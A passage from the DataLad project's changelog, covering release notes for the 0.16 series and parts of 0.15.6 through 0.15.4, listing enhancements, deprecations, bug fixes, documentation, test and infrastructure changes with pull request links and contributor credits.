[#6045](https://github.com/datalad/datalad/pull/6045) (by @adswa)\n- The default performance of ``status()`` and ``diff()`` commands is improved by up to 700% removing file-type evaluation as a default operation, and simplifying the type reporting rule [#6097](https://github.com/datalad/datalad/pull/6097) (by @mih)\n- ``drop()`` and ``remove()`` were reimplemented in full, conceptualized as the antagonist commands to ``get()`` and ``clone()``. A new, harmonized set of parameters (``--what ['filecontent', 'allkeys', 'datasets', 'all']``, ``--reckless ['modification', 'availability', 'undead', 'kill']``) simplifies their API. Both commands include additional safeguards. ``uninstall`` is replaced with a thin shim command around ``drop()`` [#6111](https://github.com/datalad/datalad/pull/6111) (by @mih)\n- ``add_archive_content()`` was refactored into a dataset method and gained progress bars [#6105](https://github.com/datalad/datalad/pull/6105) (by @adswa)\n- The ``datalad`` and ``datalad-archives`` special remotes have been reimplemented based on ``AnnexRemote`` [#6165](https://github.com/datalad/datalad/pull/6165) (by @mih)\n- The ``result_renderer()`` semantics were decomplexified and harmonized. The previous ``default`` result renderer was renamed to ``generic``. [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- ``get_status_dict`` learned to include exit codes in the case of CommandErrors [#5642](https://github.com/datalad/datalad/pull/5642) (by @yarikoptic)\n- ``datalad clone`` can now pass options to ``git-clone``, adding support for cloning specific tags or branches, naming siblings other names than ``origin``, and exposing ``git clone``'s optimization arguments [#6218](https://github.com/datalad/datalad/pull/6218) (by @kyleam and @mih)\n- Inactive BatchedCommands are cleaned up [#6206](https://github.com/datalad/datalad/pull/6206) (by @jwodder)\n- ``export-archive-ora`` learned to filter files exported to 7z archives [#6234](https://github.com/datalad/datalad/pull/6234) (by @mih and @bpinsard)\n- ``datalad run`` learned to glob recursively [#6262](https://github.com/datalad/datalad/pull/6262) (by @AKSoo)\n- The ORA remote learned to recover from interrupted uploads [#6267](https://github.com/datalad/datalad/pull/6267) (by @mih)\n- A new threaded runner with support for timeouts and generator-based subprocess communication is introduced and used in ``BatchedCommand`` and ``AnnexRepo`` [#6244](https://github.com/datalad/datalad/pull/6244) (by @christian-monch)\n- A new switch allows to enable librarymode and queries for the effective API in use [#6213](https://github.com/datalad/datalad/pull/6213) (by @mih)\n- ``run`` and ``rerun`` now support parallel jobs via ``--jobs`` [#6279](https://github.com/datalad/datalad/pull/6279) (by @AKSoo)\n- A new ``foreach-dataset`` plumbing command allows to run commands on each (sub)dataset, similar to ``git submodule foreach``\n[#5517](https://github.com/datalad/datalad/pull/5517) (by @yarikoptic)\n- The ``dataset`` parameter is not restricted to only locally resolvable file-URLs anymore [#6276](https://github.com/datalad/datalad/pull/6276) (by @christian-monch)\n- DataLad's credential system is now able to query `git-credential` by specifying credential type `git` in the respective provider configuration [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- DataLad now comes with a git credential helper `git-credential-datalad` allowing Git to query DataLad's credential system [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack and @mih)\n- The new runner now allows for multiple threads [#6371](https://github.com/datalad/datalad/pull/6371) (by @christian-monch)\n- A new configurationcommand provides an interface to manipulate and query the DataLad configuration. [#6306](https://github.com/datalad/datalad/pull/6306) (by @mih)\n - Unlike the global Python-only datalad.cfg or dataset-specific Dataset.config configuration managers, this command offers a uniform API across the Python and the command line interfaces.\n - This command was previously available in the mihextras extension as x-configuration, and has been merged into the core package in an improved version. [#5489](https://github.com/datalad/datalad/pull/5489) (by @mih)\n - In its default dump mode, the command provides an annotated list of the effective configuration after considering all configuration sources, including hints on additional configuration settings and their supported values.\n- The command line interface help-reporting has been sped up by ~20% [#6370](https://github.com/datalad/datalad/pull/6370) [#6378](https://github.com/datalad/datalad/pull/6378) (by @mih)\n- ``ConfigManager`` now supports reading committed dataset configuration in bare repositories. Analog to reading ``.datalad/config`` from a worktree, ``blob:HEAD:.datalad/config`` is read (e.g., the config committed in the default branch). The support includes ``reload()` change detection using the gitsha of this file. The behavior for non-bare repositories is unchanged. [#6332](https://github.com/datalad/datalad/pull/6332) (by @mih)\n- The CLI help generation has been sped up, and now also supports the completion of parameter values for a fixed set of choices [#6415](https://github.com/datalad/datalad/pull/6415) (by @mih)\n- Individual command implementations can now declare a specific \"on-failure\" behavior by defining `Interface.on_failure` to be one of the supported modes (stop, continue, ignore). Previously, such a modification was only possible on a per-call basis. [#6430](https://github.com/datalad/datalad/pull/6430) (by @mih)\n- The `run` command changed its default \"on-failure\" behavior from `continue` to `stop`. This change prevents the execution of a command in case a declared input can not be obtained. Previously, only an error result was yielded (and run eventually yielded a non-zero exit code or an `IncompleteResultsException`), but the execution proceeded and potentially saved a dataset modification despite incomplete inputs, in case the command succeeded. This previous default behavior can still be achieved by calling run with the equivalent of `--on-failure continue` [#6430](https://github.com/datalad/datalad/pull/6430) (by @mih)\n- The ``run` command now provides readily executable, API-specific instructions how to save the results of a command execution that failed expectedly [#6434](https://github.com/datalad/datalad/pull/6434) (by @mih)\n- `create-sibling --since=^` mode will now be as fast as `push --since=^` to figure out for which subdatasets to create siblings [#6436](https://github.com/datalad/datalad/pull/6436) (by @yarikoptic)\n- When file names contain illegal characters or reserved file names that are incompatible with Windows systems a configurable check for ``save`` (``datalad.save.windows-compat-warning``) will either do nothing (`none`), emit an incompatibility warning (`warning`, default), or cause ``save`` to error (`error`) [#6291](https://github.com/datalad/datalad/pull/6291) (by @adswa)\n- Improve responsiveness of `datalad drop` in datasets with a large annex. [#6580](https://github.com/datalad/datalad/pull/6580) (by @christian-monch)\n- `save` code might operate faster on heavy file trees [#6581](https://github.com/datalad/datalad/pull/6581) (by @yarikoptic)\n- Removed a per-file overhead cost for ORA when downloading over HTTP [#6609](https://github.com/datalad/datalad/pull/6609) (by @bpoldrack)\n- A new module `datalad.support.extensions` offers the utility functions `register_config()` and `has_config()` that allow extension developers to announce additional configuration items to the central configuration management. [#6601](https://github.com/datalad/datalad/pull/6601) (by @mih)\n- When operating in a dirty dataset, `export-to-figshare` now yields and impossible result instead of raising a RunTimeError [#6543](https://github.com/datalad/datalad/pull/6543) (by @adswa)\n- Loading DataLad extension packages has been sped-up leading to between 2x and 4x faster run times for loading individual extensions and reporting help output across all installed extensions. [#6591](https://github.com/datalad/datalad/pull/6591) (by @mih)\n- Introduces the configuration key `datalad.ssh.executable`. This key allows specifying an ssh-client executable that should be used by datalad to establish ssh-connections. The default value is `ssh` unless on a Windows system where `$WINDIR\\System32\\OpenSSH\\ssh.exe` exists. In this case, the value defaults to `$WINDIR\\System32\\OpenSSH\\ssh.exe`. [#6553](https://github.com/datalad/datalad/pull/6553) (by @christian-monch)\n- create-sibling should perform much faster in case of `--since` specification since would consider only submodules related to the changes since that point. [#6528](https://github.com/datalad/datalad/pull/6528) (by @yarikoptic)\n- A new configuration setting `datalad.ssh.try-use-annex-bundled-git=yes|no` can be used to influence the default remote git-annex bundle sensing for SSH connections. This was previously done unconditionally for any call to `datalad sshrun` (which is also used for any SSH-related Git or git-annex functionality triggered by DataLad-internal processing) and could incur a substantial per-call runtime cost. The new default is to not perform this sensing, because for, e.g., use as GIT_SSH_COMMAND there is no expectation to have a remote git-annex installation, and even with an existing git-annex/Git bundle on the remote, it is not certain that the bundled Git version is to be preferred over any other Git installation in a user's PATH. [#6533](https://github.com/datalad/datalad/pull/6533) (by @mih)\n- `run` now yields a result record immediately after executing a command. This allows callers to use the standard `--on-failure switch` to control whether dataset modifications will be saved for a command that exited with an error. [#6447](https://github.com/datalad/datalad/pull/6447) (by @mih)\n\n#### 🪓 Deprecations and removals\n\n- The ``--pbs-runner`` commandline option (deprecated in ``0.15.0``) was removed [#5981](https://github.com/datalad/datalad/pull/5981) (by @mih)\n- The dependency to PyGithub was dropped [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-github``'s credential handling was trimmed down to only allow personal access tokens, because GitHub discontinued user/password based authentication [#5949](https://github.com/datalad/datalad/pull/5949) (by @mih)\n- ``create-sibling-gitlab``'s ``--dryrun`` parameter is deprecated in favor or ``--dry-run`` [#6013](https://github.com/datalad/datalad/pull/6013) (by @adswa)\n- Internal obsolete ``Gitrepo.*_submodule`` methods were moved to ``datalad-deprecated`` [#6010](https://github.com/datalad/datalad/pull/6010) (by @mih)\n- ``datalad/support/versions.py`` is unused in DataLad core and removed [#6115](https://github.com/datalad/datalad/pull/6115) (by @yarikoptic)\n- Support for the undocumented ``datalad.api.result-renderer`` config setting has been dropped [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- Undocumented use of ``result_renderer=None`` is replaced with ``result_renderer='disabled'`` [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- ``remove``'s ``--recursive`` argument has been deprecated [#6257](https://github.com/datalad/datalad/pull/6257) (by @mih)\n- The use of the internal helper ``get_repo_instance()`` is discontinued and deprecated [#6268](https://github.com/datalad/datalad/pull/6268) (by @mih)\n- Support for Python 3.6 has been dropped ([#6286](https://github.com/datalad/datalad/pull/6286) (by @christian-monch) and [#6364](https://github.com/datalad/datalad/pull/6364) (by @yarikoptic))\n- All but one Singularity recipe flavor have been removed due to their limited value with the end of life of Singularity Hub [#6303](https://github.com/datalad/datalad/pull/6303) (by @mih)\n- All code in module datalad.cmdline was (re)moved, only datalad.cmdline.helpers.get_repo_instanceis kept for a deprecation period (by @mih)\n- ``datalad.interface.common_opts.eval_default`` has been deprecated. All (command-specific) defaults for common interface parameters can be read from ``Interface`` class attributes ([#6391](https://github.com/datalad/datalad/pull/6391) (by @mih)\n- Remove unused and untested ``datalad.interface.utils`` helpers `cls2cmdlinename` and `path_is_under` [#6392](https://github.com/datalad/datalad/pull/6392) (by @mih)\n- An unused code path for result rendering was removed from the CLI ``main()`` [#6394](https://github.com/datalad/datalad/pull/6394) (by @mih)\n- ``create-sibling`` will require now ``\"^\"`` instead of an empty string for since option [#6436](https://github.com/datalad/datalad/pull/6436) (by @yarikoptic)\n- `run` no longer raises a `CommandError` exception for failed commands, but yields an `error` result that includes a superset of the information provided by the exception. This change impacts command line usage insofar as the exit code of the underlying command is no longer relayed as the exit code of the `run` command call -- although `run` continues to exit with a non-zero exit code in case of an error. For Python API users, the nature of the raised exception changes from `CommandError` to `IncompleteResultsError`, and the exception handling is now configurable using the standard `on_failure` command argument. The original `CommandError` exception remains available via the `exception` property of the newly introduced result record for the command execution, and this result record is available via `IncompleteResultsError.failed`, if such an exception is raised. [#6447](https://github.com/datalad/datalad/pull/6447) (by @mih)\n- Custom cast helpers were removed from datalad core and migrated to a standalone repository https://github.com/datalad/screencaster [#6516](https://github.com/datalad/datalad/pull/6516) (by @adswa)\n- The `bundled` parameter of `get_connection_hash()` is now ignored and will be removed with a future release. [#6532](https://github.com/datalad/datalad/pull/6532) (by @mih)\n- `BaseDownloader.fetch()` is logging download attempts on DEBUG (previously INFO) level to avoid polluting output of higher-level commands. [#6564](https://github.com/datalad/datalad/pull/6564) (by @mih)\n\n#### 🐛 Bug Fixes\n\n- ``create-sibling-gitlab`` erroneously overwrote existing sibling configurations. A safeguard will now prevent overwriting and exit with an error result [#6015](https://github.com/datalad/datalad/pull/6015) (by @adswa)\n- ``create-sibling-gogs`` now relays HTTP500 errors, such as \"no space left on device\" [#6019](https://github.com/datalad/datalad/pull/6019) (by @mih)\n- ``annotate_paths()`` is removed from the last parts of code base that still contained it [#6128](https://github.com/datalad/datalad/pull/6128) (by @mih)\n- ``add_archive_content()`` doesn't crash with ``--key`` and ``--use-current-dir`` anymore [#6105](https://github.com/datalad/datalad/pull/6105) (by @adswa)\n- ``run-procedure`` now returns an error result when a non-existent procedure name is specified [#6143](https://github.com/datalad/datalad/pull/6143) (by @mslw)\n- A fix for a silent failure of ``download-url --archive`` when extracting the archive [#6172](https://github.com/datalad/datalad/pull/6172) (by @adswa)\n- Uninitialized AnnexRepos can now be dropped [#6183](https://github.com/datalad/datalad/pull/6183) (by @mih)\n- Instead of raising an error, the formatters tests are skipped when the ``formatters`` module is not found [#6212](https://github.com/datalad/datalad/pull/6212) (by @adswa)\n- ``create-sibling-gin`` does not disable git-annex availability on Gin remotes anymore [#6230](https://github.com/datalad/datalad/pull/6230) (by @mih)\n- The ORA special remote messaging is fixed to not break the special remote protocol anymore and to better relay messages from exceptions to communicate underlying causes [#6242](https://github.com/datalad/datalad/pull/6242) (by @mih)\n- A ``keyring.delete()`` call was fixed to not call an uninitialized private attribute anymore [#6253](https://github.com/datalad/datalad/pull/6253) (by @bpoldrack)\n- An erroneous placement of result keyword arguments into a ``format()`` method instead of ``get_status_dict()`` of ``create-sibling-ria`` has been fixed [#6256](https://github.com/datalad/datalad/pull/6256) (by @adswa)\n- ``status``, ``run-procedure``, and ``metadata`` are no longer swallowing result-related messages in renderers [#6280](https://github.com/datalad/datalad/pull/6280) (by @mih)\n- ``uninstall`` now recommends the new ``--reckless`` parameter instead of the deprecated ``--nocheck`` parameter when reporting hints [#6277](https://github.com/datalad/datalad/pull/6277) (by @adswa)\n- ``download-url`` learned to handle Pathobjects [#6317](https://github.com/datalad/datalad/pull/6317) (by @adswa)\n- Restore default result rendering behavior broken by Key interface documentation [#6394](https://github.com/datalad/datalad/pull/6394) (by @mih)\n- Fix a broken check for file presence in the ``ConfigManager`` that could have caused a crash in rare cases when a config file is removed during the process runtime [#6332](https://github.com/datalad/datalad/pull/6332) (by @mih)\n`- ``ConfigManager.get_from_source()`` now accesses the correct information when using the documented ``source='local'``, avoiding a crash [#6332](https://github.com/datalad/datalad/pull/6332) (by @mih)\n- ``run`` no longer let's the internal call to `save` render its results unconditionally, but the parameterization f run determines the effective rendering format. [#6421](https://github.com/datalad/datalad/pull/6421) (by @mih)\n- Remove an unnecessary and misleading warning from the runner [#6425](https://github.com/datalad/datalad/pull/6425) (by @christian-monch)\n- A number of commands stopped to double-report results [#6446](https://github.com/datalad/datalad/pull/6446) (by @adswa)\n- `create-sibling-ria` no longer creates an `annex/objects` directory in-store, when called with `--no-storage-sibling`. [#6495](https://github.com/datalad/datalad/pull/6495) (by @bpoldrack )\n- Improve error message when an invalid URL is given to `clone`. [#6500](https://github.com/datalad/datalad/pull/6500) (by @mih)\n- DataLad declares a minimum version dependency to ``keyring >= 20.0`` to ensure that token-based authentication can be used. [#6515](https://github.com/datalad/datalad/pull/6515) (by @adswa)\n- ORA special remote tries to obtain permissions when dropping a key from a RIA store rather than just failing. Thus having the same permissions in the store's object trees as one directly managed by git-annex would have, works just fine now. [#6493](https://github.com/datalad/datalad/pull/6493) (by @bpoldrack )\n- `require_dataset()` now uniformly raises `NoDatasetFound` when no dataset was found. Implementations that catch the previously documented `InsufficientArgumentsError` or the actually raised `ValueError` will continue to work, because `NoDatasetFound` is derived from both types. [#6521](https://github.com/datalad/datalad/pull/6521) (by @mih)\n- Keyboard-interactive authentication is now possibly with non-multiplexed SSH connections (i.e., when no connection sharing is possible, due to lack of socket support, for example on Windows). Previously, it was disabled forcefully by DataLad for no valid reason. [#6537](https://github.com/datalad/datalad/pull/6537) (by @mih)\n- Remove duplicate exception type in reporting of top-level CLI exception handler. [#6563](https://github.com/datalad/datalad/pull/6563) (by @mih)\n- Fixes DataLad's parsing of git-annex' reporting on unknown paths depending on its version and the value of the `annex.skipunknown` config. [#6550](https://github.com/datalad/datalad/pull/6550) (by @bpoldrack)\n- Fix ORA special remote not properly reporting on HTTP failures. [#6535](https://github.com/datalad/datalad/pull/6535) (by @bpoldrack)\n- ORA special remote didn't show per-file progress bars when downloading over HTTP [#6609](https://github.com/datalad/datalad/pull/6609) (by @bpoldrack)\n- `save` now can commit the change where file becomes a directory with a staged for commit file. [#6581](https://github.com/datalad/datalad/pull/6581) (by @yarikoptic)\n- `create-sibling` will no longer create siblings for not yet saved new subdatasets, and will now create sub-datasets nested in the subdatasets which did not yet have those siblings. [#6603](https://github.com/datalad/datalad/pull/6603) (by @yarikoptic)\n\n#### 📝 Documentation\n\n- A new design document sheds light on result records [#6167](https://github.com/datalad/datalad/pull/6167) (by @mih)\n- The ``disabled`` result renderer mode is documented [#6174](https://github.com/datalad/datalad/pull/6174) (by @mih)\n- A new design document sheds light on the ``datalad`` and ``datalad-archives`` special remotes [#6181](https://github.com/datalad/datalad/pull/6181) (by @mih)\n- A new design document sheds light on ``BatchedCommand`` and ``BatchedAnnex`` [#6203](https://github.com/datalad/datalad/pull/6203) (by @christian-monch)\n- A new design document sheds light on standard parameters [#6214](https://github.com/datalad/datalad/pull/6214) (by @adswa)\n- The DataLad project adopted the Contributor Covenant COC v2.1 [#6236](https://github.com/datalad/datalad/pull/6236) (by @adswa)\n- Docstrings learned to include Sphinx' \"version added\" and \"deprecated\" directives [#6249](https://github.com/datalad/datalad/pull/6249) (by @mih)\n- A design document sheds light on basic docstring handling and formatting [#6249](https://github.com/datalad/datalad/pull/6249) (by @mih)\n- A new design document sheds light on position versus keyword parameter usage [#6261](https://github.com/datalad/datalad/pull/6261) (by @yarikoptic)\n- ``create-sibling-gin``'s examples have been improved to suggest ``push`` as an additional step to ensure proper configuration [#6289](https://github.com/datalad/datalad/pull/6289) (by @mslw)\n- A new [document](http://docs.datalad.org/credentials.html) describes the credential system from a user's perspective [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- Enhance the [design document](http://docs.datalad.org/design/credentials.html) on DataLad's credential system [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- The documentation of the configuration command now details all locations DataLad is reading configuration items from, and their respective rules of precedence [#6306](https://github.com/datalad/datalad/pull/6306) (by @mih)\n- API docs for datalad.interface.base are now included in the documentation [#6378](https://github.com/datalad/datalad/pull/6378) (by @mih)\n- A new design document is provided that describes the basics of the command line interface implementation [#6382](https://github.com/datalad/datalad/pull/6382) (by @mih)\n- The ``datalad.interface.base.Interface` class, the basis of all DataLad command implementations, has been extensively documented to provide an overview of basic principles and customization possibilities [#6391](https://github.com/datalad/datalad/pull/6391) (by @mih)\n- `--since=^` mode of operation of `create-sibling` is documented now [#6436](https://github.com/datalad/datalad/pull/6436) (by @yarikoptic)\n\n#### 🏠 Internal\n\n- The internal ``status()`` helper was equipped with docstrings and promotes \"breadth-first\" reporting with a new parameter ``reporting_order`` [#6006](https://github.com/datalad/datalad/pull/6006) (by @mih)\n- ``AnnexRepo.get_file_annexinfo()`` is introduced for more convenient queries for single files and replaces a now deprecated ``AnnexRepo.get_file_key()`` to receive information with fewer calls to Git [#6104](https://github.com/datalad/datalad/pull/6104) (by @mih)\n- A new ``get_paths_by_ds()`` helper exposes ``status``' path normalization and sorting [#6110](https://github.com/datalad/datalad/pull/6110) (by @mih)\n- ``status`` is optimized with a cache for dataset roots [#6137](https://github.com/datalad/datalad/pull/6137) (by @yarikoptic)\n- The internal ``get_func_args_doc()`` helper with Python 2 is removed from DataLad core [#6175](https://github.com/datalad/datalad/pull/6175) (by @yarikoptic)\n- Further restructuring of the source tree to better reflect the internal dependency structure of the code: ``AddArchiveContent`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6188](https://github.com/datalad/datalad/pull/6188) (by @mih)), ``Clean`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6191](https://github.com/datalad/datalad/pull/6191) (by @mih)), ``Unlock`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6192](https://github.com/datalad/datalad/pull/6192) (by @mih)), ``DownloadURL`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6217](https://github.com/datalad/datalad/pull/6217) (by @mih)), ``Rerun`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6220](https://github.com/datalad/datalad/pull/6220) (by @mih)), ``RunProcedure`` is moved from ``datalad/interface`` to ``datalad/local`` ([#6222](https://github.com/datalad/datalad/pull/6222) (by @mih)). The interface command list is restructured and resorted [#6223](https://github.com/datalad/datalad/pull/6223) (by @mih)\n- ``wrapt`` is replaced with functools' ``wraps``\n[#6190](https://github.com/datalad/datalad/pull/6190) (by @yariktopic)\n- The unmaintained ``appdirs`` library has been replaced with ``platformdirs`` [#6198](https://github.com/datalad/datalad/pull/6198) (by @adswa)\n- Modelines mismatching the code style in source files were fixed [#6263](https://github.com/datalad/datalad/pull/6263) (by @AKSoo)\n- ``datalad/__init__.py`` has been cleaned up [#6271](https://github.com/datalad/datalad/pull/6271) (by @mih)\n- ``GitRepo.call_git_items`` is implemented with a generator-based runner [#6278](https://github.com/datalad/datalad/pull/6278) (by @christian-monch)\n- Separate positional from keyword arguments in the Python API to match CLI with ``*`` [#6176](https://github.com/datalad/datalad/pull/6176) (by @yarikoptic), [#6304](https://github.com/datalad/datalad/pull/6304) (by @christian-monch)\n- ``GitRepo.bare`` does not require the ConfigManager anymore [#6323](https://github.com/datalad/datalad/pull/6323) (by @mih)\n- ``_get_dot_git()`` was reimplemented to be more efficient and consistent, by testing for common scenarios first and introducing a consistently applied ``resolved`` flag for result path reporting [#6325](https://github.com/datalad/datalad/pull/6325) (by @mih)\n- All data files under ``datalad`` are now included when installing DataLad [#6336](https://github.com/datalad/datalad/pull/6336) (by @jwodder)\n- Add internal method for non-interactive provider/credential storing [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- Allow credential classes to have a context set, consisting of a URL they are to be used with and a dataset DataLad is operating on, allowing to consider \"local\" and \"dataset\" config locations [#5796](https://github.com/datalad/datalad/pull/5796) (by @bpoldrack)\n- The Interface method ``get_refds_path()`` was deprecated [#6387](https://github.com/datalad/datalad/pull/6387) (by @adswa)\n- ``datalad.interface.base.Interface`` is now an abstract class [#6391](https://github.com/datalad/datalad/pull/6391) (by @mih)\n- Simplified the decision making for result rendering, and reduced code complexity [#6394](https://github.com/datalad/datalad/pull/6394) (by @mih)\n- Reduce code duplication in ``datalad.support.json_py`` [#6398](https://github.com/datalad/datalad/pull/6398) (by @mih)\n- Use public `ArgumentParser.parse_known_args` instead of protected `_parse_known_args` [#6414](https://github.com/datalad/datalad/pull/6414) (by @yarikoptic)\n- `add-archive-content` does not rely on the deprecated `tempfile.mktemp` anymore, but uses the more secure `tempfile.mkdtemp` [#6428](https://github.com/datalad/datalad/pull/6428) (by @adswa)\n- AnnexRepo's internal `annexstatus` is deprecated. In its place, a new test helper assists the few tests that rely on it [#6413](https://github.com/datalad/datalad/pull/6413) (by @adswa)\n- ``config`` has been refactored from ``where[=\"dataset\"]`` to ``scope[=\"branch\"]`` [#5969](https://github.com/datalad/datalad/pull/5969) (by @yarikoptic)\n- Common command arguments are now uniformly and exhaustively passed to result renderers and filters for decision making. Previously, the presence of a particular argument depended on the respective API and circumstances of a command call. [#6440](https://github.com/datalad/datalad/pull/6440) (by @mih)\n- Entrypoint processing for extensions and metadata extractors has been consolidated on a uniform helper that is about twice as fast as the previous implementations. [#6591](https://github.com/datalad/datalad/pull/6591) (by @mih)\n\n#### 🛡 Tests\n\n- A range of Windows tests pass and were enabled [#6136](https://github.com/datalad/datalad/pull/6136) (by @adswa)\n- Invalid escape sequences in some tests were fixed [#6147](https://github.com/datalad/datalad/pull/6147) (by @mih)\n- A cross-platform compatible HTTP-serving test environment is introduced [#6153](https://github.com/datalad/datalad/pull/6153) (by @mih)\n- A new helper exposes ``serve_path_via_http`` to the command line to deploy an ad-hoc instance of the HTTP server used for internal testing, with SSL and auth, if desired. [#6169](https://github.com/datalad/datalad/pull/6169) (by @mih)\n- Windows tests were redistributed across worker runs to harmonize runtime [#6200](https://github.com/datalad/datalad/pull/6200) (by @adswa)\n- ``Batchedcommand`` gained a basic test [#6203](https://github.com/datalad/datalad/pull/6203) (by @christian-monch)\n- The use of ``with_testrepo`` is discontinued in all core tests [#6224](https://github.com/datalad/datalad/pull/6224) (by @mih)\n- The new ``git-annex.filter.annex.process`` configuration is enabled by default on Windows to speed up the test suite [#6245](https://github.com/datalad/datalad/pull/6245) (by @mih)\n- If the available Git version supports it, the test suite now uses ``GIT_CONFIG_GLOBAL`` to configure a fake home directory instead of overwriting ``HOME`` on OSX ([#6251](https://github.com/datalad/datalad/pull/6251) (by @bpoldrack)) and ``HOME`` and ``USERPROFILE`` on Windows [#6260](https://github.com/datalad/datalad/pull/6260) (by @adswa)\n- Windows test timeouts of runners were addressed [#6311](https://github.com/datalad/datalad/pull/6311) (by @christian-monch)\n- A handful of Windows tests were fixed ([#6352](https://github.com/datalad/datalad/pull/6352) (by @yarikoptic)) or disabled ([#6353](https://github.com/datalad/datalad/pull/6353) (by @yarikoptic))\n- ``download-url``'s test under ``http_proxy`` are skipped when a session can't be established [#6361](https://github.com/datalad/datalad/pull/6361) (by @yarikoptic)\n- A test for ``datalad clean`` was fixed to be invoked within a dataset [#6359](https://github.com/datalad/datalad/pull/6359) (by @yarikoptic)\n- The new datalad.cli.tests have an improved module coverage of 80% [#6378](https://github.com/datalad/datalad/pull/6378) (by @mih)\n- The ``test_source_candidate_subdataset`` has been marked as ``@slow`` [#6429](https://github.com/datalad/datalad/pull/6429) (by @yarikoptic)\n- Dedicated ``CLI`` benchmarks exist now [#6381](https://github.com/datalad/datalad/pull/6381) (by @mih)\n- Enable code coverage report for subprocesses [#6546](https://github.com/datalad/datalad/pull/6546) (by @adswa)\n- Skip a test on annex>=10.20220127 due to a bug in annex. See https://git-annex.branchable.com/bugs/Change_to_annex.largefiles_leaves_repo_modified/\n\n#### 🚧 Infra\n\n- A new issue template using GitHub forms prestructures bug reports [#6048](https://github.com/datalad/datalad/pull/6048) (by @Remi-Gau)\n- DataLad and its dependency stack were packaged for Gentoo Linux [#6088](https://github.com/datalad/datalad/pull/6088) (by @TheChymera)\n- The readthedocs configuration is modernized to version 2 [#6207](https://github.com/datalad/datalad/pull/6207) (by @adswa)\n- The Windows CI setup now runs on Appveyor's Visual Studio 2022 configuration [#6228](https://github.com/datalad/datalad/pull/6228) (by @adswa)\n- The ``readthedocs-theme`` and ``Sphinx`` versions were pinned to re-enable rendering of bullet points in the documentation [#6346](https://github.com/datalad/datalad/pull/6346) (by @adswa)\n- The PR template was updated with a CHANGELOG template. Future PRs should use it to include a summary for the CHANGELOG [#6396](https://github.com/datalad/datalad/pull/6396) (by @mih)\n\n#### Authors: 11\n\n- Michael Hanke (@mih)\n- Yaroslav Halchenko (@yarikoptic)\n- Adina Wagner (@adswa)\n- Remi Gau (@Remi-Gau)\n- Horea Christian (@TheChymera)\n- Michał Szczepanik (@mslw)\n- Christian Mönch (@christian-monch)\n- John T. Wodder (@jwodder)\n- Benjamin Poldrack (@bpoldrack)\n- Sin Kim (@AKSoo)\n- Basile Pinsard (@bpinsard)\n\n---\n\n# 0.15.6 (Sun Feb 27 2022)\n\n#### 🐛 Bug Fix\n\n- BF: do not use BaseDownloader instance wide InterProcessLock - resolves stalling or errors during parallel installs [#6507](https://github.com/datalad/datalad/pull/6507) ([@yarikoptic](https://github.com/yarikoptic))\n- release workflow: add -vv to auto invocation ([@yarikoptic](https://github.com/yarikoptic))\n- Fix version incorrectly incremented by release process in CHANGELOGs [#6459](https://github.com/datalad/datalad/pull/6459) ([@yarikoptic](https://github.com/yarikoptic))\n- BF(TST): add another condition to skip under http_proxy set [#6459](https://github.com/datalad/datalad/pull/6459) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 1\n\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.5 (Wed Feb 09 2022)\n\n#### 🚀 Enhancement\n\n- BF: When download-url gets Pathobject as path convert it to a string [#6364](https://github.com/datalad/datalad/pull/6364) ([@adswa](https://github.com/adswa))\n\n#### 🐛 Bug Fix\n\n- Fix AnnexRepo.whereis key=True mode operation, and add batch mode support [#6379](https://github.com/datalad/datalad/pull/6379) ([@yarikoptic](https://github.com/yarikoptic))\n- DOC: run - adjust description for -i/-o to mention that it could be a directory [#6416](https://github.com/datalad/datalad/pull/6416) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: ORA over HTTP tried to check archive [#6355](https://github.com/datalad/datalad/pull/6355) ([@bpoldrack](https://github.com/bpoldrack) [@yarikoptic](https://github.com/yarikoptic))\n- BF: condition access to isatty to have stream eval to True [#6360](https://github.com/datalad/datalad/pull/6360) ([@yarikoptic](https://github.com/yarikoptic))\n- BF: python 3.10 compatibility fixes [#6363](https://github.com/datalad/datalad/pull/6363) ([@yarikoptic](https://github.com/yarikoptic))\n- Remove two(!) copies of a test [#6374](https://github.com/datalad/datalad/pull/6374) ([@mih](https://github.com/mih))\n- Warn just once about incomplete git config [#6343](https://github.com/datalad/datalad/pull/6343) ([@yarikoptic](https://github.com/yarikoptic))\n- Make version detection robust to GIT_DIR specification [#6341](https://github.com/datalad/datalad/pull/6341) ([@effigies](https://github.com/effigies) [@mih](https://github.com/mih))\n- BF(Q&D): do not crash - issue warning - if template fails to format [#6319](https://github.com/datalad/datalad/pull/6319) ([@yarikoptic](https://github.com/yarikoptic))\n\n#### Authors: 5\n\n- Adina Wagner ([@adswa](https://github.com/adswa))\n- Benjamin Poldrack ([@bpoldrack](https://github.com/bpoldrack))\n- Chris Markiewicz ([@effigies](https://github.com/effigies))\n- Michael Hanke ([@mih](https://github.com/mih))\n- Yaroslav Halchenko ([@yarikoptic](https://github.com/yarikoptic))\n\n---\n\n# 0.15.4 (Thu Dec 16 2021)\n\n#### 🐛 Bug Fix\n\n- BF: autorc - replace incorrect releaseTypes with \"none\" [#6320](https://github.com/datalad/datalad/pull/6320) ([@yarikoptic](https://github.com/yarikoptic))\n- Minor enhancement to CONTRIBUTING.md [#6309](https://github.com/datalad/datalad/pull/6309) ([@bpoldrack](https://github.com/bpoldrack))\n- UX: If a clean repo is dirty after a failed run, give clean-up hints [#6112](https://github.com/datalad/datalad/pull/6112) ([@adswa](https://github.com/adswa))\n- Stop using distutils [#6113](https://github.com/datalad/datalad/pull/6113) ([@jwodder](https://github.com/jwodder))\n- BF: RIARemote - set UI backend to annex to make it interactive [#6287](https://github.com/datalad/datalad/pull/6287) 